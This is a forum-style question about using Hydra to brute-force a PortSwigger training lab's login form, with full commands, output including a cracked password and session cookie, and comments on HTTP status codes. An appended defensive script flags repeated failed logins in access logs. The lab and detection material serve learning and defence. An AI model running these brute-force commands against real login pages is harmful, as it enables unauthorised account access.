
I am doing PortSwigger labs with Hydra https-post-form. I am trying to look for packets that don't have status code 200 OK, because when I checked in Burp, my failed login with a bad password and a good username had status code 200 OK.

└─$ hydra -l activestat -P ./password -T  9 -vvv -I ac311f351ebe430c80453e6300b10013.web-security-academy.net https-post-form "/login:username=^USER^&password=^PASS^:F=200 OK"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-15 11:10:21
[DATA] max 9 tasks per 1 server, overall 9 tasks, 100 login tries (l:1/p:100), ~12 tries per task
[DATA] attacking http-post-forms://ac311f351ebe430c80453e6300b10013.web-security-academy.net:443/login:username=^USER^&password=^PASS^:F=200 OK
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] Page redirected to http://:443/my-account
[STATUS] attack finished for ac311f351ebe430c80453e6300b10013.web-security-academy.net (waiting for children to complete tests)
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-15 11:10:29

As you can see, I got 0 valid passwords found. But when I entered the success phrase, the one I got from the lab solution (status code 302), I got the correct password:

└─$ hydra -l activestat -P ./password -T  9 -vvv -I ac311f351ebe430c80453e6300b10013.web-security-academy.net https-post-form "/login:username=^USER^&password=^PASS^:S=302"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-15 11:03:08
[DATA] max 9 tasks per 1 server, overall 9 tasks, 100 login tries (l:1/p:100), ~12 tries per task
[DATA] attacking http-post-forms://ac311f351ebe430c80453e6300b10013.web-security-academy.net:443/login:username=^USER^&password=^PASS^:S=302
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[443][http-post-form] host: ac311f351ebe430c80453e6300b10013.web-security-academy.net   login: activestat   password: 2000
[STATUS] attack finished for ac311f351ebe430c80453e6300b10013.web-security-academy.net (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-15 11:03:27

The response after success:

HTTP/1.1 302 Found
Location: /my-account
Set-Cookie: session=TAz87Tx9GTaWtckpbOaujoqibP4bNGzn; Secure; HttpOnly; SameSite=None
Content-Encoding: gzip
Connection: close
Content-Length: 0

I also checked another option, one that is always returned after a failed login:

:F=Invalid username or password

But still no results. Do you know where the problem is?

Zorot
  • Also, can you tell me or give me a link to information on where the list of characters I have to escape is? I found out that / and . need to be escaped, but couldn't find it in the manual. – Zorot Aug 15 '21 at 09:24
  • Hi, I suggest you use wfuzz or its Go version to do a brute-force attack against an HTTP form. – Marco Nappi Aug 15 '21 at 09:48
  • I'll check it soon, thank you. I tried to do this in Burp, but it's too slow without a premium account. – Zorot Aug 15 '21 at 10:01
  • Let me know how it goes. To find a correct login among all the requests, search for the HTTP code 302. – Marco Nappi Aug 15 '21 at 11:15
  • But why doesn't searching for something that doesn't have HTTP code 200 work? If it's 302 it cannot be 200 :// – Zorot Aug 15 '21 at 13:42
  • 302 stands for "found", aka a successful redirect. You can see that in your answer. – Marco Nappi Aug 15 '21 at 15:39
  • So when we deal with login forms, it mostly gives 200 OK and redirects with 302 Found. In Burp we get the 302 code because it's coded in the application and gives us a redirect status code? – Zorot Aug 15 '21 at 22:37
  • I mean, why doesn't F=200 work if we get a 302 successful redirect? Maybe it checks the whole chain? And there are 2 responses in one stack, one with 200, the other with 302, and the 302 is discarded? – Zorot Aug 15 '21 at 22:41
  • 200 means it loads the login page. 302 means the server redirects the user to the account page. – Marco Nappi Aug 16 '21 at 11:19
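
The status-code pattern discussed above (200 for a failed login, 302 for a successful one) seen from the server side, as an added example that is not part of the original question or comments: it scans access-log lines for a run of failed POST /login requests from one client and reports whether a 302 followed. The log format, client addresses, threshold and the names `find_guessing` and `SAMPLE` are constructed assumptions.

```python
import re
from collections import defaultdict

# Common-log-style line: client, method, path, status (format is an assumption).
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def find_guessing(lines, threshold=10):
    """Flag clients with >= threshold consecutive failed logins (POST /login -> 200).

    Returns {client: {"failed": n, "succeeded": bool}}, where "succeeded" means
    the run of failures ended with a 302 (the login redirect to the account page).
    Time windows are ignored to keep the example short.
    """
    failed = defaultdict(int)
    flagged = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        client, method, path, status = m.groups()
        if method != "POST" or path != "/login":
            continue
        if status == "200":            # login page served again: failed attempt
            failed[client] += 1
        elif status == "302":          # redirect after a successful login
            if failed[client] >= threshold:
                flagged[client] = {"failed": failed[client], "succeeded": True}
            failed[client] = 0
    for client, n in failed.items():   # runs that never ended in a success
        if n >= threshold and client not in flagged:
            flagged[client] = {"failed": n, "succeeded": False}
    return flagged


def _line(ip, sec, status, req="POST /login"):
    return f'{ip} - - [15/Aug/2021:11:03:{sec:02d} +0000] "{req} HTTP/1.1" {status} 0'


# Constructed sample log: one guessing run that succeeds, one user who
# mistypes once, one guessing run that never succeeds.
SAMPLE = ([_line("203.0.113.7", s, 200) for s in range(12)]
          + [_line("203.0.113.7", 12, 302)]
          + [_line("198.51.100.4", 20, 200), _line("198.51.100.4", 25, 302)]
          + [_line("198.51.100.4", 26, 200, req="GET /my-account")]
          + [_line("192.0.2.9", s, 200) for s in range(30, 45)])

if __name__ == "__main__":
    for client, info in find_guessing(SAMPLE).items():
        print(client, info)
```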
